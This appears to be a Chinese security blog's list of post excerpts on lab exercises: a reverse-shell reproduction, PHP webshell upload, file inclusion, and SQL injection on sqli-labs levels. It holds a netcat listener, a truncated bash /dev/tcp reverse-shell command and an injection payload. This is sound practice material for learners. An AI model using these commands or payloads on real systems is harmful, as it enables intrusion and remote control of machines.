摘要:
part1:不求甚解的本地复现 攻击端Debian 10.x: 192.168.208.134 受害端Ubuntu : 192.168.208.135 攻击端打开(监听)某端口: 键入命令:【nc -lvp 8080】 受害端执行反弹shell: 键入命令:【bash -i >& /dev/tcp/ 阅读全文
摘要:
靶子代码: 前端效果: 这是个没有任何防护的文件上传代码,同时还热心的附上了上传文件的路径。 我们写好php木马后,什么额外工作也不需要做,直接上传就行了。上传后在浏览器里访问该文件,其就会被执行。 注意,该文件扩展名必须为.php,否则浏览器访问时不会得到执行。 上传的同时,抓包,看下包的内容。 阅读全文
摘要:
PHP文件包含漏洞花样繁多,需配合代码审计。 看能否使用这类漏洞时,主要看: (1)代码中是否有include(),且参数可控; 如: (2)php.ini设置:确保 allow_url_fopen=1, allow_url_include=1; 确定了使用的参数之后,就可以开始用伪协议了。 1. 阅读全文
摘要:
布尔盲注适用于任何情况回显都不变的情况。 (由此,可以看出,回显啥的其实都不重要,最重要的是判断注入点。只要找到注入点了,其他的都是浮云。) 在操作上,时间盲注还稍微简单一点;它不需要像布尔盲注那样,我们还需要去比对各种回显,找判断条件。 顶多是,post的时候,去burp里对一下参数就行了。 布尔 阅读全文
摘要:
终于写到非get类型的注入了。 不过,我懒得在这里搞代码审计了;留到存储型XSS原型的时候再来分析源码吧。 这次以Less-15为例。 框里随便输点东西,submit,抓包,发现包出现了一些改变: 同时,发现注入 (这里必须用#; --+不行) 再试,发现了三种回显:什么都不输入的无配图,登入失败的 阅读全文
摘要:
现在,我们回到之前,练习脚本支持的布尔盲注(get型)。 布尔盲注的应用场景是查询成功和失败时回显不同,且存在注入点的地方。 这里以Less-8为例: 发现查询成功时,会显示;失败则无回显。 同时发现,payload: ?id=0' or 1=1 --+ 可以查询成功;即此处存在注入点,or可以得到 阅读全文
摘要:
系统的http状态码知识,我是在《图解http里学习的》。 状态码的职责是告知从服务器端返回的请求结果。 分类如下: 2XX --> 成功 200 OK(一般情况) 204 No Content(无实体) 206 Partial Content(部分实体) 3XX --> 重定向 301 Moved 阅读全文
摘要:
首先申明,Less-(38~41)可以采取和Less-(1~4)相同的解法;(一一对应) 然而,他们的漏洞其实更大,我们可以做更多具有破坏性的事情。 代码审计: Less-(38~41): 41的$sql同39,但没有报错回显了。 mysqli_multi_query() 执行一个或多个针对数据库的 阅读全文
摘要:
<!-- 下午整了半天Less-29~31,愣是没调好jsp环境,只好跳过。 难受.jpg !--> Less-32: 核心语句: 各种回显均存在。 第一句话指定了字符集为gbk。 chech_addslaches 函数是个很强的过滤: 在第二行和第三行, 它通过在前面加一个反斜杠将其转义的方式,屏 阅读全文
摘要:
Less-26: 核心语句: 各种回显均存在。 本题相比Less-25,多屏蔽了很多符号; 首先是各种注释符 --+,#,/**/ 。 /[]/表示字符集合;任何出现在里面的字符均会被替换。 屏蔽{ / * \ }等比较特殊的字符时,需要加上转义符号。 /s 不是转义 而是匹配任何空白字符,包括空格 阅读全文